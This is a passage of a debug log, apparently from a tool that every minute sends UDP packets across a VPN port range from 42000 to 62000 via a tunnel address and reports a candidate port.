to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:42:05 +Starting port fill at 2020-09-06 12:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:43:05 +Starting port fill at 2020-09-06 12:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:44:07 +Starting port fill at 2020-09-06 12:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:45:07 +Starting port fill at 2020-09-06 12:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:46:04 +Starting port fill at 2020-09-06 12:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:47:06 +Starting port fill at 2020-09-06 12:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:48:04 +Starting port fill at 2020-09-06 12:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:49:04 +Starting port fill at 2020-09-06 12:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:50:04 +Starting port fill at 2020-09-06 12:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:51:06 +Starting port fill at 2020-09-06 12:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:52:05 +Starting port fill at 2020-09-06 12:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:53:04 +Starting port fill at 2020-09-06 12:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:54:06 +Starting port fill at 2020-09-06 12:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:55:07 +Starting port fill at 2020-09-06 12:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:56:07 +Starting port fill at 2020-09-06 12:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:57:07 +Starting port fill at 2020-09-06 12:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:58:06 +Starting port fill at 2020-09-06 12:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:59:05 +Starting port fill at 2020-09-06 13:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:00:05 +Starting port fill at 2020-09-06 13:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 13:01:07 +Starting port fill at 2020-09-06 13:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 13:02:07 +Starting port fill at 2020-09-06 13:03:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:03:05 +Starting port fill at 2020-09-06 13:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 13:04:06 +Starting port fill at 2020-09-06 13:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:05:06 +Starting port fill at 2020-09-06 13:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:06:04 +Starting port fill at 2020-09-06 13:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:07:05 +Starting port fill at 2020-09-06 13:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:08:06 +Starting port fill at 2020-09-06 13:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:09:05 +Starting port fill at 2020-09-06 13:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:10:04 +Starting port fill at 2020-09-06 13:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:11:04 +Starting port fill at 2020-09-06 13:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 13:12:06 +Starting port fill at 2020-09-06 13:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 